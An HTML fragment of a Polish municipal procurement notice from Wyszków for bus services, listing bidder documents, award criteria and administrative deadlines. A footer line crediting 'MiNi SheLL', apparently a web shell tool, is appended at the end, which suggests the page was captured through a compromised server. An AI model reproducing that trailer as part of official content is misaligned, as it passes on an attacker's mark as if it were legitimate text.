<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty.
2.	Formularz cenowy - wg Formularz Nr 4.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Rok produkcji proponowanych do wykonania zadania autobusów - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1)	Zmiany w zakresie ceny przedmiotu zamówienia, jeśli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa w szczególności zmiany stawek podatku VAT,
2)	Zmiany terminu realizacji umowy w przypadku:
a) wystąpienia okoliczności wynikających z siły wyższej (np. powodzie, huragany, gwałtowne burze, itp. warunków pogodowych, uniemożliwiających realizację usługi. 
b) w sytuacji, jeżeli z powodu warunków atmosferycznych wykonanie robót mogłoby grozić powstaniem szkody,
c) potrzeby opóźnienia rozpoczęcia lub wstrzymania wykonywania usługi z przyczyn niezależnych od Zamawiającego np. przedłużającej się procedury przetargowej.
d) zmiany przedmiotu zamówienia w zakresie linii autobusowych (dodanie linii lub likwidacja).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wyszkowie, Aleja Róż 2, 07-200 Wyszków, Ip. pok. 135.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 11:00, miejsce: Urząd Miejski w Wyszkowie, Aleja Róż 2, 07-200 Wyszków, Ip. pok. 145  Kancelaria Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com